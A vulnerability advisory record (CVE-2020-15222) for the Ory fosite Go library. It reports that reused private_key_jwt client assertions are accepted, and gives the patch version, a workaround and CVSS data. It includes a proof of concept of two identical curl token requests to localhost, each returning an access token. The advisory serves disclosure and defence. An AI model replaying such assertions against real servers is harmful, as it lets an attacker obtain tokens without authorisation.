GHSA-v3q9-2p3m-7g43

Source

https://github.com/advisories/GHSA-v3q9-2p3m-7g43

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-v3q9-2p3m-7g43/GHSA-v3q9-2p3m-7g43.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-v3q9-2p3m-7g43

Aliases

Related

CVE-2020-15222

Published

2021-05-24T16:57:52Z

Modified

2024-05-19T02:24:27.584711Z

Severity

8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N CVSS Calculator

Summary

Token reuse in Ory fosite

Details

Impact

When using client authentication method "privatekeyjwt" [1], OpenId specification says the following about assertion jti:

A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties

Hydra does not seem to check the uniqueness of this jti value. Here is me sending the same token request twice, hence with the same jti assertion, and getting two access tokens:

$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
   --header 'Content-Type: application/x-www-form-urlencoded' \
   --data-urlencode 'grant_type=client_credentials' \
   --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
   --data-urlencode 'scope=application openid' \
   --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
   --data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM","expires_in":3599,"scope":"application openid","token_type":"bearer"}⏎
$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
   --header 'Content-Type: application/x-www-form-urlencoded' \
   --data-urlencode 'grant_type=client_credentials' \
   --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
   --data-urlencode 'scope=application openid' \
   --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
   --data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4","expires_in":3599,"scope":"application openid","token_type":"bearer"}

Patches

This issue is patched in 0.31.0.

Workarounds

Do not allow clients to use private_key_jwt.

References

https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication

Database specific

{
    "nvd_published_at": "2020-09-24T17:15:00Z",
    "severity": "HIGH",
    "github_reviewed_at": "2021-05-24T12:52:00Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-287",
        "CWE-345"
    ]
}

References

Affected packages

Go / github.com/ory/fosite

Package

Name: github.com/ory/fosite; View open source insights on deps.dev
Purl: pkg:golang/github.com/ory/fosite

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.31.0